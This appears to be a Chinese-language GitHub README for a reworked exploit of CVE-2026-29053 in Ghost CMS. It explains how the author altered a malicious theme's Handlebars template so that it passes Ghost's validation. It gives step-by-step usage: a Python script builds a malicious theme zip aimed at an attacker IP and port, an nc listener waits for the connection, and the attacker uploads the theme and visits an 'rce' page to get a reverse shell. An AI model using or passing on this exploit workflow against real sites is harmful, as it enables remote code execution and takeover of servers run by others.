AC8999/CVE-2026-29053

这是对 rootxran 针对同一 CVE 所建仓库的重制版 - https://github.com/rootxran/CVE-2026-29053 在针对特定 Ghost CMS 环境进行测试时，原始的 theme payload 触发了致命的 Handlebars 错误。由于在 author.hbs 文件中引用了已弃用或缺失的 helper (social_url)，CMS 未能成功激活该恶意主题。 我已更新 Handlebars 模板以使用原生、兼容的 helper。这确保了主题能够通过 Ghost 的内部验证检查，从而使 exploit 能够成功激活，而不会被主题引擎的安全解析器拦截。 使用方法：（有关视频指南，请参阅原始 exploit）。 ``` ┌──(root㉿user)-[/tmp/CVE-2026-29053] └─# python3 exploit.py -i 10.10.15.93 -p 4444 [+] Payload: 10.10.15.93:4444 [+] Created: /tmp/CVE-2026-29053/malicious-theme.zip 1. nc -lvnp 4444 2. Upload theme, create page with slug 'rce' 3. Visit /rce/ ```

标签：0day, CISA项目, CVE-2026-29053, Ghost CMS, Go语言工具, Handlebars, Netcat, OPA, Python, RCE, 主题上传, 反弹Shell, 安全攻防, 恶意载荷, 数据展示, 文档安全, 无后门, 漏洞复现, 红队, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护, 靶场